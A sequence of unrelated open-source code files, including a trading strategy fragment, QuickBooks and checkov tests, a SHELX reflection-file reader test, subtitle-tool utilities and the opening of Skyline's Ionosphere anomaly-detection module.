self.load_bar(3) # 加载3天的数据.
def on_start(self):
"""
Callback when strategy is started.
"""
self.write_log("策略启动")
def on_stop(self):
"""
Callback when strategy is stopped.
"""
self.write_log("策略停止")
# def process_account_event(self, event: Event):
# self.account: AccountData = event.data
# if self.account:
# print(
# f"self.account: available{self.account.available}, balance:{self.account.balance}, frozen: {self.account.frozen}")
def on_tick(self, tick: TickData):
"""
Callback of new tick data update.
"""
if tick.bid_price_1 > 0 and tick.ask_price_1 > 0:
self.bg_1hour.update_tick(tick)
self.bg_4hour.update_tick(tick)
def on_bar(self, bar: BarData):
"""
Callback of new bar data update.
"""
if self.entry_highest_price > 0:
self.entry_highest_price = max(bar.high_price, self.entry_highest_price)
if self.current_pos * bar.close_price >= self.min_notional:
            # We currently hold a position.
            if len(self.sell_orders) <= 0 < self.avg_price:
                # Close the position for a profit here.
                # Cancel the remaining buy orders first.
profit_percent = bar.close_price / self.avg_price - 1
profit_pull_back_pct = self.entry_highest_price / bar.close_price - 1
if profit_percent >= self.exit_profit_pct and profit_pull_back_pct >= self.exit_pull_back_pct:
self.cancel_all()
orderids = self.sell(bar.close_price, abs(self.current_pos))
self.sell_orders.extend(orderids)
if len(self.buy_orders) <= 0:
                # Conditions for adding to the position: 1) we hold a position worth more than 11 USDT,
                # 2) the number of adds is still below the maximum, 3) price has dropped a given
                # percentage below the last entry price.
                dump_down_pct = self.last_entry_price / bar.close_price - 1
                if self.current_increase_pos_count <= self.max_increase_pos_count and dump_down_pct >= self.increase_pos_when_dump_pct:
                    # ** is the exponentiation operator.
                    self.cancel_all()  # Cancel the remaining sell orders.
increase_pos_value = self.initial_trading_value * self.trading_value_multiplier ** self.current_increase_pos_count
price = bar.close_price
vol = increase_pos_value / price
orderids = self.buy(price, vol)
self.buy_orders.extend(orderids)
self.bg_1hour.update_bar(bar)
self.bg_4hour.update_bar(bar)
self.put_event()
def on_1hour_bar(self, bar: BarData):
        close_change_pct = bar.close_price / bar.open_price - 1  # How much the close rose versus the open.
        high_change_pct = bar.high_price / bar.close_price - 1  # Size of the upper wick (high above close).
        # When price has pulled back by a certain percentage.
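        # Illustrative example (added comment, not part of the original
        # strategy; parameter values are hypothetical): with
        # hour_pump_pct = 0.02 and high_close_change_pct = 0.03, a bar that
        # opens at 100, closes at 103 and highs at 104 gives
        # close_change_pct = 0.03 and high_change_pct ~= 0.0097, so the
        # pump-entry condition below would be satisfied.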
if self.current_pos * bar.close_price < self.min_notional: # 10 USDT
            # Each order must be worth at least 10 USDT; 11 USDT is used for simplicity.
if close_change_pct >= self.hour_pump_pct and high_change_pct < self.high_close_change_pct and len(
self.buy_orders) == 0:
                # No position is held here.
                # Reset the current state.
self.cancel_all()
self.current_increase_pos_count = 0
self.avg_price = 0
self.entry_highest_price = 0.0
price = bar.close_price
vol = self.initial_trading_value / price
orderids = self.buy(price, vol)
                self.buy_orders.extend(orderids)  # Track the order ids that have been submitted.
def on_4hour_bar(self, bar: BarData):
        close_change_pct = bar.close_price / bar.open_price - 1  # How much the close rose versus the open.
        high_change_pct = bar.high_price / bar.close_price - 1  # Size of the upper wick (high above close).
        # When price has pulled back by a certain percentage.
if self.current_pos * bar.close_price < self.min_notional:
            # Each order must be worth at least 10 USDT; 11 USDT is used for simplicity.
if close_change_pct >= self.four_hour_pump_pct and high_change_pct < self.high_close_change_pct and len(
self.buy_orders) == 0:
                # No position is held here.
                # Reset the current state.
self.cancel_all()
self.current_increase_pos_count = 0
self.avg_price = 0
self.entry_highest_price = 0.0
price = bar.close_price
vol = self.initial_trading_value / price
orderids = self.buy(price, vol)
                self.buy_orders.extend(orderids)  # Track the order ids that have been submitted.
def on_order(self, order: OrderData):
"""
Callback of new order data update.
"""
if order.status == Status.ALLTRADED:
if order.direction == Direction.LONG:
                # A buy order has been fully filled.
self.current_increase_pos_count += 1
                self.last_entry_price = order.price  # Record the price of the last fill.
self.entry_highest_price = order.price
if not order.is_active():
if order.vt_orderid in self.sell_orders:
self.sell_orders.remove(order.vt_orderid)
elif order.vt_orderid in self.buy_orders:
self.buy_orders.remove(order.vt_orderid)
        self.put_event()  # Refresh the UI.
def on_trade(self, trade: TradeData):
"""
Callback of new trade data update.
"""
if trade.direction == Direction.LONG:
total = self.avg_price * self.current_pos + trade.price * trade.volume
self.current_pos += trade.volume
self.avg_price = total / self.current_pos
elif trade.direction == Direction.SHORT:
self.current_pos -= trade.volume
            # Compute and accumulate the overall profit.
profit = (trade.price - self.avg_price) * trade.volume
total_fee = trade.volume * trade.price * 2 * self.trading_fee
self.total_profit += profit - total_fee
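        # Illustrative example (added comment, not part of the original
        # strategy; values are hypothetical): holding 2 units at an avg_price
        # of 10, buying 2 more at 12 gives avg_price = (10 * 2 + 12 * 2) / 4 = 11;
        # a later sell at 13 books profit = (13 - 11) * volume, minus trading
        # fees charged on both legs.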
self.put_event()
def on_stop_order(self, stop_order: StopOrder):
"""
Callback of stop order update.
"""
pass
|
tests/integration/test_account.py | varunbheemaiah/python-quickbooks | 234 | 12610513 | <reponame>varunbheemaiah/python-quickbooks
from datetime import datetime
from quickbooks.objects.account import Account
from tests.integration.test_base import QuickbooksTestCase
class AccountTest(QuickbooksTestCase):
def setUp(self):
super(AccountTest, self).setUp()
self.account_number = datetime.now().strftime('%d%H%M')
self.name = "Test Account {0}".format(self.account_number)
def test_create(self):
account = Account()
account.AcctNum = self.account_number
account.Name = self.name
account.AccountSubType = "CashOnHand"
account.save(qb=self.qb_client)
self.id = account.Id
query_account = Account.get(account.Id, qb=self.qb_client)
self.assertEquals(account.Id, query_account.Id)
self.assertEquals(query_account.Name, self.name)
self.assertEquals(query_account.AcctNum, self.account_number)
def test_update(self):
account = Account.filter(Name=self.name, qb=self.qb_client)[0]
account.Name = "Updated Name {0}".format(self.account_number)
account.save(qb=self.qb_client)
query_account = Account.get(account.Id, qb=self.qb_client)
self.assertEquals(query_account.Name, "Updated Name {0}".format(self.account_number))
|
actions/close_list.py | martezr/stackstorm-trello | 164 | 12610524 | <filename>actions/close_list.py
from lib import action
class CloseListAction(action.BaseAction):
def run(self, list_id, board_id, api_key=None, token=None):
if api_key:
self._set_creds(api_key=api_key, token=token)
trello_list = self._client().get_board(board_id).get_list(list_id)
trello_list.close()
return trello_list.closed
|
doc/example1.py | ajschumacher/plac | 233 | 12610541 | <reponame>ajschumacher/plac<filename>doc/example1.py
# example1.py
def main(dsn):
"Do something with the database"
print("ok")
if __name__ == '__main__':
import sys
n = len(sys.argv[1:])
if n == 0:
sys.exit('usage: python %s dsn' % sys.argv[0])
elif n == 1:
main(sys.argv[1])
else:
sys.exit('Unrecognized arguments: %s' % ' '.join(sys.argv[2:]))
|
iotbx/shelx/tst_hklf.py | whart222/cctbx_project | 155 | 12610588 | <reponame>whart222/cctbx_project
from __future__ import absolute_import, division, print_function
from iotbx.shelx import hklf
from cctbx.array_family import flex
from libtbx.test_utils import approx_equal
from libtbx.test_utils import Exception_expected, show_diff
from six.moves import cStringIO as StringIO
def exercise_hklf_reader():
s = (' 1 2 -1 -23.34 4.56 1\n'
' 2 -3 9 12.45 6.12 2\r\n'
'99999999999999999.9999999.999999\n'
'-999-999-999-9999.99-9999.99-999\r\n'
' 0 0 0 0.00 0.00 0\n')
r = hklf.reader(file_object=StringIO(s))
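    # Note (added comment, not part of the original test): the strings above
    # use the fixed-width SHELX HKLF layout - three 4-character h, k, l
    # fields, two 8-character fields for the intensity and its sigma, and an
    # optional trailing 4-character batch/alpha field - which is why a run of
    # digits such as '99999999999999999.9999999.999999' parses without any
    # separators.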
assert list(r.indices()) == [
(1, 2, -1), (2, -3, 9), (9999, 9999, 9999), (-999, -999, -999), ]
assert approx_equal(r.data(), [-23.34, 12.45, 99999.99, -9999.99, ])
assert approx_equal(r.sigmas(), [4.56, 6.12, 99999.99, -9999.99, ])
assert approx_equal(r.batch_numbers(), [1, 2, 9999, -999, ])
assert approx_equal(r.alphas(), [1, 2, 9999, -999, ])
for ma in r.as_miller_arrays():
assert ma.indices().all_eq(r.indices())
assert ma.anomalous_flag() is False
ma = r.as_miller_arrays()[0]
assert ma.data().all_approx_equal(r.data())
assert ma.sigmas().all_approx_equal(r.sigmas())
ma = r.as_miller_arrays()[1]
assert ma.data().all_eq(r.alphas())
assert ma.sigmas() is None
s = (' 0 2 3 1816.00 20.00\n'
' 0 2 415508.00 138.00\n'
' 0 2 5 4776.00 40.00\n')
r = hklf.reader(file_object=StringIO(s))
assert list(r.indices()) == [ (0,2,3), (0,2,4), (0,2,5) ]
assert r.batch_numbers() is None
assert r.alphas() is None
assert r.wavelengths() is None
for end_line in (True, False):
for something_after_end_line in (True, False):
s = (' 1 2 -1 23.34 4.56\n'
' 2 -3 9 12.45 6.12\r\n'
'99999999999999999.9999999.99\n'
'-999-999-999-9999.99-9999.99\n')
if end_line:
s += ' 0 0 0 0.00 0.00\n'
if something_after_end_line:
s += ' -5 1 0 123.45 66.12\n'
s = (s)
r = hklf.reader(file_object=StringIO(s))
assert approx_equal(r.sigmas(), [4.56, 6.12, 99999.99, -9999.99, ])
assert r.batch_numbers() is None
assert r.alphas() is None
assert r.wavelengths() is None
s = ''
try: r = hklf.reader(file_object=StringIO(s))
except RuntimeError: pass
else: raise Exception_expected
s = (' 1 2 -1 23.34 4.56 1\n'
' 2 -3 a9 12.45 6.12 2\n'
' 0 0 0 0.00 0.00 0\n')
try: r = hklf.reader(file_object=StringIO(s))
except Exception: pass
else: raise Exception_expected
s = (' 1 2 -1 23.34 4.56 1 45.36\n'
' 2 -3 9 -12.45 -6.12 2 54.63\n'
' 0 0 0 0.00 0.00 0 0\n')
r = hklf.reader(file_object=StringIO(s))
assert list(r.indices()) == [ (1, 2, -1), (2, -3, 9)]
assert approx_equal(r.data(), [23.34, -12.45])
assert approx_equal(r.sigmas(), [4.56, -6.12])
assert approx_equal(r.batch_numbers(), [1, 2])
assert approx_equal(r.wavelengths(), [45.36, 54.63])
s = (' 1 2 -1 23. 4. 2\n'
' -2 1 3 -1. 3. 1\n'
' 0 0 0 0. 0. 0\n')
r = hklf.reader(file_object=StringIO(s))
assert list(r.indices()) == [(1, 2, -1), (-2, 1, 3)]
assert approx_equal(r.data(), [23, -1])
assert approx_equal(r.sigmas(), [4, 3])
assert approx_equal(r.alphas(), [2, 1])
assert r.wavelengths() is None
s = (' 3 2 -1 32. 5.\n'
' 0 0 0\n')
r = hklf.reader(file_object=StringIO(s))
assert list(r.indices()) == [(3, 2, -1)]
assert approx_equal(r.data(), [32])
assert approx_equal(r.sigmas(), [5])
assert r.alphas() is None
assert r.wavelengths() is None
s = (
"""King Arthur: [after Arthur's cut off both of the Black Knight's arms]
Look, you stupid Bastard. You've got no arms left.
Black Knight: Yes I have.
King Arthur: *Look*!
Black Knight: It's just a flesh wound.""")
try: r = hklf.reader(file_object=StringIO(s))
except RuntimeError: pass
else: raise Exception_expected
def exercise_miller_export_as_shelx_hklf():
s = """\
1 2 -1 23.34 4.56
2 -3 9 12.45 6.12
99999999999999999.9999999.99
-999-999-999-9999.99-9999.99
3 4 5999999.99999999.
3 4 5-99999.9-999999.
"""
ma = hklf.reader(file_object=StringIO(s)).as_miller_arrays()[0]
sio = StringIO()
ma.export_as_shelx_hklf(file_object=sio)
ma2 = hklf.reader(file_object=StringIO(sio.getvalue())).as_miller_arrays()[0]
assert approx_equal(ma.indices(), ma2.indices())
assert approx_equal(ma.data(), ma2.data())
assert approx_equal(ma.sigmas(), ma2.sigmas())
assert ma.anomalous_flag() is False
assert ma2.anomalous_flag() is False
#
ma = ma.select(flex.size_t([0]))
def check(d, s, f):
if (s is not None): s = flex.double([s])
ma2 = ma.array(data=flex.double([d]), sigmas=s)
sio = StringIO()
ma2.export_as_shelx_hklf(sio, normalise_if_format_overflow=True)
assert not show_diff(sio.getvalue(), """\
1 2 -1%s
0 0 0 0.00 0.00
""" % f)
try: ma2.export_as_shelx_hklf(sio)
except RuntimeError: pass
else: raise Exception_expected
check(-12345678, 1, "-999999. 0.08")
check(-12345678, None, "-999999. 0.00")
check(2, -12345678, " 0.16-999999.")
check(123456789, 30, "9999999. 2.43")
check(123456789, None, "9999999. 0.00")
check(40, 123456789, " 3.249999999.")
check(-23456789, 123456789, "-999999.5263153.")
check(123456789, -23456789, "5263153.-999999.")
#
ma = hklf.reader(file_object=StringIO(s)).as_miller_arrays()[0]
ma = ma.select(flex.size_t([0,1]))
ma2 = ma.array(data=flex.double([123456789, -23456789]))
sio = StringIO()
ma2.export_as_shelx_hklf(sio, normalise_if_format_overflow=True)
assert not show_diff(sio.getvalue(), """\
1 2 -15263153. 0.00
2 -3 9-999999. 0.00
0 0 0 0.00 0.00
""")
ma2 = ma.array(data=flex.double([-23456789, 823456789]))
sio = StringIO()
ma2.export_as_shelx_hklf(sio, normalise_if_format_overflow=True)
assert not show_diff(sio.getvalue(), """\
1 2 -1-284858. 0.00
2 -3 99999999. 0.00
0 0 0 0.00 0.00
""")
# Test that setting the scale range works.
ma2.export_as_shelx_hklf(
sio,
scale_range=(-9999., 9999.),
normalise_if_format_overflow=True)
# Test that ignoring the scale range and normalising out-of-range values anyway works.
ma2.export_as_shelx_hklf(sio, full_dynamic_range=True)
def run():
exercise_hklf_reader()
exercise_miller_export_as_shelx_hklf()
print("OK")
if __name__ == '__main__':
run()
|
srt_tools/utils.py | xl8-ai/srt | 285 | 12610614 | #!/usr/bin/env python
import argparse
import codecs
import srt
import logging
import sys
import itertools
import collections
import os
PROG_NAME = os.path.basename(sys.argv[0]).replace("-", " ", 1)
STDIN_BYTESTREAM = getattr(sys.stdin, "buffer", sys.stdin)
STDOUT_BYTESTREAM = getattr(sys.stdout, "buffer", sys.stdout)
DASH_STREAM_MAP = {"input": STDIN_BYTESTREAM, "output": STDOUT_BYTESTREAM}
try: # Python 2
range = xrange # pytype: disable=name-error
except NameError:
pass
log = logging.getLogger(__name__)
def noop(stream):
"""
Used when we didn't explicitly specify a stream to avoid using
codecs.get{reader,writer}
"""
return stream
def dash_to_stream(arg, arg_type):
if arg == "-":
return DASH_STREAM_MAP[arg_type]
return arg
def basic_parser(
description=None,
multi_input=False,
no_output=False,
examples=None,
hide_no_strict=False,
):
example_lines = []
if examples is not None:
example_lines.append("examples:")
for desc, code in examples.items():
example_lines.append(" {}".format(desc))
example_lines.append(" $ {}\n".format(code))
parser = argparse.ArgumentParser(
prog=PROG_NAME,
description=description,
epilog="\n".join(example_lines),
formatter_class=argparse.RawDescriptionHelpFormatter,
)
# Cannot use argparse.FileType as we need to know the encoding from the
# args
if multi_input:
parser.add_argument(
"--input",
"-i",
metavar="FILE",
action="append",
type=lambda arg: dash_to_stream(arg, "input"),
help="the files to process",
required=True,
)
else:
parser.add_argument(
"--input",
"-i",
metavar="FILE",
default=STDIN_BYTESTREAM,
type=lambda arg: dash_to_stream(arg, "input"),
help="the file to process (default: stdin)",
)
if not no_output:
parser.add_argument(
"--output",
"-o",
metavar="FILE",
default=STDOUT_BYTESTREAM,
type=lambda arg: dash_to_stream(arg, "output"),
help="the file to write to (default: stdout)",
)
if not multi_input:
parser.add_argument(
"--inplace",
"-p",
action="store_true",
help="modify file in place",
)
shelp = "allow blank lines in output, your media player may explode"
if hide_no_strict:
shelp = argparse.SUPPRESS
parser.add_argument("--no-strict", action="store_false", dest="strict", help=shelp)
parser.add_argument(
"--debug",
action="store_const",
dest="log_level",
const=logging.DEBUG,
default=logging.INFO,
help="enable debug logging",
)
parser.add_argument(
"--ignore-parsing-errors",
"-c",
action="store_true",
help="try to keep going, even if there are parsing errors",
)
parser.add_argument(
"--encoding", "-e", help="the encoding to read/write files in (default: utf8)"
)
return parser
def set_basic_args(args):
# TODO: dedupe some of this
if getattr(args, "inplace", None):
if args.input == DASH_STREAM_MAP["input"]:
raise ValueError("Cannot use --inplace on stdin")
if args.output != DASH_STREAM_MAP["output"]:
raise ValueError("Cannot use -o and -p together")
args.output = args.input
for stream_name in ("input", "output"):
log.debug('Processing stream "%s"', stream_name)
try:
stream = getattr(args, stream_name)
except AttributeError:
# For example, in the case of no_output
continue
# We don't use system default encoding, because usually one runs this
# on files they got from elsewhere. As such, be opinionated that these
# files are probably UTF-8. Looking for the BOM on reading allows us to
# be more liberal with what we accept, without adding BOMs on write.
read_encoding = args.encoding or "utf-8-sig"
write_encoding = args.encoding or "utf-8"
r_enc = codecs.getreader(read_encoding)
w_enc = codecs.getwriter(write_encoding)
log.debug("Got %r as stream", stream)
# We don't use encoding= option to open because we want to have the
# same universal newlines behaviour as STD{IN,OUT}_BYTESTREAM
if stream in DASH_STREAM_MAP.values():
log.debug("%s in DASH_STREAM_MAP", stream_name)
if stream is args.input:
args.input = srt.parse(
r_enc(args.input).read(), ignore_errors=args.ignore_parsing_errors
)
elif stream is args.output:
# Since args.output is not in text mode (since we didn't
# earlier know the encoding), we have no universal newline
# support and need to do it ourselves
args.output = w_enc(args.output)
else:
log.debug("%s not in DASH_STREAM_MAP", stream_name)
if stream is args.input:
if isinstance(args.input, collections.MutableSequence):
for i, input_fn in enumerate(args.input):
if input_fn in DASH_STREAM_MAP.values():
if stream is args.input:
args.input[i] = srt.parse(
r_enc(input_fn).read(),
ignore_errors=args.ignore_parsing_errors,
)
else:
f = r_enc(open(input_fn, "rb"))
with f:
args.input[i] = srt.parse(
f.read(), ignore_errors=args.ignore_parsing_errors
)
else:
f = r_enc(open(stream, "rb"))
with f:
args.input = srt.parse(
f.read(), ignore_errors=args.ignore_parsing_errors
)
else:
args.output = w_enc(open(args.output, "wb"))
def compose_suggest_on_fail(subs, strict=True):
try:
return srt.compose(subs, strict=strict, eol=os.linesep, in_place=True)
except srt.SRTParseError as thrown_exc:
        # Since `subs` is actually a generator, parse errors only surface
        # here when it is consumed during composition.
log.critical(
"Parsing failed, maybe you need to pass a different encoding "
"with --encoding?"
)
raise
def sliding_window(seq, width=2, inclusive=True):
"""
If inclusive is True, we also include final elements where len(sliced) <
width.
"""
seq_iter = iter(seq)
# Consume seq_iter up to width
sliced = tuple(itertools.islice(seq_iter, width))
if not inclusive and len(sliced) != width:
return
yield sliced
for elem in seq_iter:
sliced = sliced[1:] + (elem,)
yield sliced
if inclusive:
for idx in range(len(sliced)):
if idx != 0:
yield sliced[idx:]
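# Example usage of sliding_window (illustrative, not part of the original
# module):
#   list(sliding_window([1, 2, 3, 4], width=2))
#   -> [(1, 2), (2, 3), (3, 4), (4,)]
#   list(sliding_window([1, 2, 3, 4], width=2, inclusive=False))
#   -> [(1, 2), (2, 3), (3, 4)]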
|
tests/terraform/checks/resource/aws/test_RDSClusterEncrypted.py | jamesholland-uk/checkov | 4,013 | 12610624 | import unittest
import hcl2
from checkov.terraform.checks.resource.aws.RDSClusterEncrypted import check
from checkov.common.models.enums import CheckResult
class TestRDSClusterEncrypted(unittest.TestCase):
def test_failure(self):
hcl_res = hcl2.loads("""
resource "aws_rds_global_cluster" "example" {
provider = aws.primary
global_cluster_identifier = "example"
}
""")
resource_conf = hcl_res['resource'][0]['aws_rds_global_cluster']['example']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.FAILED, scan_result)
def test_failure_explicit(self):
hcl_res = hcl2.loads("""
resource "aws_rds_global_cluster" "example" {
provider = aws.primary
global_cluster_identifier = "example"
storage_encrypted = false
}
""")
resource_conf = hcl_res['resource'][0]['aws_rds_global_cluster']['example']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.FAILED, scan_result)
def test_success(self):
hcl_res = hcl2.loads("""
resource "aws_rds_global_cluster" "example" {
provider = aws.primary
global_cluster_identifier = "example"
storage_encrypted = true
}
""")
resource_conf = hcl_res['resource'][0]['aws_rds_global_cluster']['example']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.PASSED, scan_result)
def test_success_with_source_db_cluster_identifier(self):
hcl_res = hcl2.loads("""
resource "aws_rds_global_cluster" "example" {
provider = aws.primary
global_cluster_identifier = "example"
source_db_cluster_identifier = "some_arn"
}
""")
resource_conf = hcl_res['resource'][0]['aws_rds_global_cluster']['example']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.UNKNOWN, scan_result)
if __name__ == '__main__':
unittest.main()
|
pingo/examples/galileo_analog_bars.py | rbanffy/pingo | 116 | 12610636 | <filename>pingo/examples/galileo_analog_bars.py<gh_stars>100-1000
import pingo
import time
board = pingo.galileo.Galileo2()
pot = board.pins['A0']
pot.mode = pingo.ANALOG
def bar(pin):
print "*" * int(pin.ratio() * 70)
while True:
bar(pot)
time.sleep(0.05)
|
skyline/ionosphere/ionosphere.py | datastreaming/skyline-1 | 396 | 12610656 | from __future__ import division
import logging
import os
from os import kill, getpid, listdir
from os.path import join, isfile
from sys import version_info
# @modified 20191115 - Branch #3262: py3
# try:
# from Queue import Empty
# except:
# from queue import Empty
from time import time, sleep
from threading import Thread
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets in place of Manager().list to reduce memory and number of
# processes
# from multiprocessing import Process, Manager
from multiprocessing import Process
import re
from shutil import rmtree
# @added 20200813 - Feature #3670: IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
from shutil import move as shutil_move
# import csv
from ast import literal_eval
from datetime import datetime
# from redis import StrictRedis
import traceback
from timeit import default_timer as timer
import mysql.connector
# from mysql.connector import errorcode
from sqlalchemy.sql import select
# @added 20180715 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
from sqlalchemy.sql import desc
# @added 20161213 - Branch #1790: test_tsfresh
# To match the new order introduced via the test_tsfresh method
import numpy as np
# import pandas as pd
# @added 20170107 - Feature #1852: Ionosphere - features_profile matched graphite graphs
# Feature #1844: ionosphere_matched DB table
from tsfresh import __version__ as tsfresh_version
# @added 20170809 - Task #2132: Optimise Ionosphere DB usage
from pymemcache.client.base import Client as pymemcache_Client
# @added 20180617 - Feature #2404: Ionosphere - fluid approximation
import pandas as pd
from tsfresh.feature_extraction import (
# @modified 20210101 - Task #3928: Update Skyline to use new tsfresh feature extraction method
# extract_features, ReasonableFeatureExtractionSettings)
extract_features, EfficientFCParameters)
import settings
from skyline_functions import (
fail_check, mysql_select, write_data_to_file, send_graphite_metric,
# @added 20170825 - Task #2132: Optimise Ionosphere DB usage
# @modified 20190408 - Feature #2484: FULL_DURATION feature profiles
# Moved to common_functions
# get_memcache_metric_object)
mkdir_p,
# @added 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# Added a single functions to deal with Redis connection and the
# charset='utf-8', decode_responses=True arguments required in py3
get_redis_conn, get_redis_conn_decoded,
# @added 20200714 - Bug #3644: Do not apply ionosphere_busy to batch processing metrics
# Feature #3480: batch_processing
is_batch_metric)
# @added 20161221 - calculate features for every anomaly, instead of making the
# user do it in the frontend or calling the webapp constantly in a cron like
# manner. Decouple Ionosphere from the webapp.
from features_profile import calculate_features_profile
# @modified 20170107 - Feature #1844: ionosphere_matched DB table
# Added ionosphere_matched_meta
from database import (
get_engine, ionosphere_table_meta,
# @added 20170825 - Task #2132: Optimise Ionosphere DB usage
# @modified 20190408 - Feature #2484: FULL_DURATION feature profiles
# Moved to common_functions
# metrics_table_meta,
ionosphere_matched_table_meta,
# @added 20200516 - Bug #3546: Change ionosphere_enabled if all features profiles are disabled
# Readded metrics_table to set ionosphere_enabled to 0 if a metric has no
# fps enabled and has been willy nillied
metrics_table_meta,
# @added 20210412 - Feature #4014: Ionosphere - inference
# Branch #3590: inference
motifs_matched_table_meta,
# @added 20210414 - Feature #4014: Ionosphere - inference
# Branch #3590: inference
not_anomalous_motifs_table_meta,
)
# @added 20210425 - Task #4030: refactoring
# Feature #4014: Ionosphere - inference
from functions.numpy.percent_different import get_percent_different
from tsfresh_feature_names import TSFRESH_FEATURES
# @added 20170114 - Feature #1854: Ionosphere learn
# @modified 20170117 - Feature #1854: Ionosphere learn - generations
# Renamed the function from simple learn to the meme it has become
# from learn import learn
from learn import ionosphere_learn
# @added 20170306 - Feature #1960: ionosphere_layers
from layers import run_layer_algorithms
# @added 20190322 - Feature #2484: FULL_DURATION feature profiles
from common_functions import (
get_metrics_db_object, get_calculated_features)
# @added 20190327 - Feature #2484
from echo import ionosphere_echo
# @added 20210702 - Feature #4152: DO_NOT_SKIP_SKYLINE_FEEDBACK_NAMESPACES
from matched_or_regexed_in_list import matched_or_regexed_in_list
skyline_app = 'ionosphere'
skyline_app_logger = '%sLog' % skyline_app
logger = logging.getLogger(skyline_app_logger)
skyline_app_logfile = '%s/%s.log' % (settings.LOG_PATH, skyline_app)
skyline_app_loglock = '%s.lock' % skyline_app_logfile
skyline_app_logwait = '%s.wait' % skyline_app_logfile
python_version = int(version_info[0])
this_host = str(os.uname()[1])
# Converting one settings variable into a local variable, just because it is a
# long string otherwise.
try:
ENABLE_IONOSPHERE_DEBUG = settings.ENABLE_IONOSPHERE_DEBUG
except:
logger.error('error :: cannot determine ENABLE_IONOSPHERE_DEBUG from settings')
ENABLE_IONOSPHERE_DEBUG = False
try:
SERVER_METRIC_PATH = '.%s' % settings.SERVER_METRICS_NAME
if SERVER_METRIC_PATH == '.':
SERVER_METRIC_PATH = ''
except:
SERVER_METRIC_PATH = ''
# @added 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# Number of processes to assign to Ionosphere, however Ionosphere should never
# need more than 1 and is effectively hard coded as such currently. This
# variable is only declared for the purpose of maintaining a standard set up in
# each module and to possibly enable more than one processor on Ionosphere in
# the future, should there be a requirement for Ionosphere to analyse the
# metrics quicker. Running Ionosphere with more than one process is untested
# and currently it is hard coded to be 1
# (https://github.com/earthgecko/skyline/issues/69)
try:
IONOSPHERE_PROCESSES = settings.IONOSPHERE_PROCESSES
if IONOSPHERE_PROCESSES != 1:
IONOSPHERE_PROCESSES = 1
except:
IONOSPHERE_PROCESSES = 1
# @added 20190524 - Bug #3050: Ionosphere - Skyline and Graphite feedback
# Do not run checks if namespace has matched multiple times in the
# last 10 minutes. However determining which Skyline related metrics
# are feeding back is quite difficult to ascertain. So use the
# ionosphere_busy logic again and use or find the skyline host namespace
# and if busy do not analyse the Skyline host namespace while
# ionosphere is busy.
try:
# @modified 20200606 - Bug #3572: Apply list to settings import
SKYLINE_FEEDBACK_NAMESPACES = list(settings.SKYLINE_FEEDBACK_NAMESPACES)
except:
# Let us take a guess
try:
graphite_host = str(settings.GRAPHITE_HOST)
graphite_hostname = graphite_host.split('.', -1)[0]
SKYLINE_FEEDBACK_NAMESPACES = [settings.SERVER_METRICS_NAME, graphite_hostname]
except:
SKYLINE_FEEDBACK_NAMESPACES = [this_host]
# @added 20210702 - Feature #4152: DO_NOT_SKIP_SKYLINE_FEEDBACK_NAMESPACES
try:
DO_NOT_SKIP_SKYLINE_FEEDBACK_NAMESPACES = list(settings.DO_NOT_SKIP_SKYLINE_FEEDBACK_NAMESPACES)
except:
DO_NOT_SKIP_SKYLINE_FEEDBACK_NAMESPACES = []
# @added 20200330 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
try:
IONOSPHERE_MANAGE_PURGE = settings.IONOSPHERE_MANAGE_PURGE
except:
IONOSPHERE_MANAGE_PURGE = True
# @added 20200413 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
try:
from settings import BATCH_PROCESSING
except:
BATCH_PROCESSING = None
try:
# @modified 20200606 - Bug #3572: Apply list to settings import
# from settings import BATCH_PROCESSING_NAMESPACES
BATCH_PROCESSING_NAMESPACES = list(settings.BATCH_PROCESSING_NAMESPACES)
except:
BATCH_PROCESSING_NAMESPACES = []
# @added 20200813 - Feature #3670: IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
try:
IONOSPHERE_HISTORICAL_DATA_FOLDER = settings.IONOSPHERE_HISTORICAL_DATA_FOLDER
except:
IONOSPHERE_HISTORICAL_DATA_FOLDER = '/opt/skyline/ionosphere/historical_data'
try:
IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR = settings.IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
except:
IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR = []
# @added 20210412 - Feature #4014: Ionosphere - inference
# Branch #3590: inference
try:
IONOSPHERE_INFERENCE_MOTIFS_ENABLED = settings.IONOSPHERE_INFERENCE_MOTIFS_ENABLED
except:
IONOSPHERE_INFERENCE_MOTIFS_ENABLED = True
if IONOSPHERE_INFERENCE_MOTIFS_ENABLED:
from inference import ionosphere_motif_inference
else:
ionosphere_motif_inference = None
try:
IONOSPHERE_INFERENCE_MOTIFS_TEST_ONLY = settings.IONOSPHERE_INFERENCE_MOTIFS_TEST_ONLY
except:
IONOSPHERE_INFERENCE_MOTIFS_TEST_ONLY = False
# @added 20210419 - Feature #4014: Ionosphere - inference
# Only store motif data in the database if specifically enabled
try:
IONOSPHERE_INFERENCE_STORE_MATCHED_MOTIFS = settings.IONOSPHERE_INFERENCE_STORE_MATCHED_MOTIFS
except:
IONOSPHERE_INFERENCE_STORE_MATCHED_MOTIFS = False
# @added 20210512 - Feature #4064: VERBOSE_LOGGING
try:
VERBOSE_LOGGING = settings.IONOSPHERE_VERBOSE_LOGGING
except:
VERBOSE_LOGGING = False
skyline_app_graphite_namespace = 'skyline.%s%s' % (skyline_app, SERVER_METRIC_PATH)
max_age_seconds = settings.IONOSPHERE_CHECK_MAX_AGE
# Database configuration
config = {'user': settings.PANORAMA_DBUSER,
'password': <PASSWORD>,
'host': settings.PANORAMA_DBHOST,
'port': settings.PANORAMA_DBPORT,
'database': settings.PANORAMA_DATABASE,
'raise_on_warnings': True}
failed_checks_dir = '%s_failed' % settings.IONOSPHERE_CHECK_PATH
last_purge_key = '%s.last_purge_ts' % skyline_app
LOCAL_DEBUG = False
